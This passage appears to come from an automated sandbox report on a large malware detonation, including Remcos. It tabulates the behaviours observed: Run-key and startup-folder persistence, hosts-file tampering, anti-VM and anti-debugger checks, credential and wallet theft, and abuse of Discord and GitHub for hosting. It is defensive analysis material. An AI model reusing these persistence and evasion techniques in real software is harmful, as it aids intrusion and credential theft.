| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Stops running service(s)
Uses browser remote debugging
A potential corporate email address has been identified in the URL: 3SCET_Admin@OFGADUSE_report.wsr
A potential corporate email address has been identified in the URL: naAjO_Admin@OFGADUSE_report.wsr
A potential corporate email address has been identified in the URL: oDRAV_Admin@OFGADUSE_report.wsr
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3020718451.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2568621829.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\qwex.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\seksiak.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\seksiak.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\seksiak.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\pornhub_downloader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\PORNHU~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\svchost.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\Desktop\Files\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\Desktop\Files\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk | C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk | C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\Desktop\\New Text Document mod.exse\\a\\networkmanager.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\afasdfga = "C:\\Users\\Admin\\AppData\\Roaming\\afasdfga.exe" | C:\Users\Admin\Desktop\Files\Mswgoudnv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y8B03.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\svchost" | C:\Users\Admin\Desktop\Files\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\Desktop\Files\twztl.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dxwebsetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftProfile = "C:\\Users\\Admin\\MicrosoftProfile.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\SigniantApp_Installer_1.5.1806.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\leto.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe | N/A |
Checks installed software on the system
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\GameBarPresenceWriter.exe | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\DirectX\WebSetup | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\DirectX\WebSetup\filelist.dat | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\directx\websetup\dsetup32.dll | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File created | C:\Windows\SysWOW64\DirectX\WebSetup\dxupdate.cab | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\directx\websetup\SET71B2.tmp | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File created | C:\Windows\SysWOW64\directx\websetup\SET71B2.tmp | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\directx\websetup\dsetup.dll | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\directx\websetup\SET71C2.tmp | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File created | C:\Windows\SysWOW64\directx\websetup\SET71C2.tmp | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
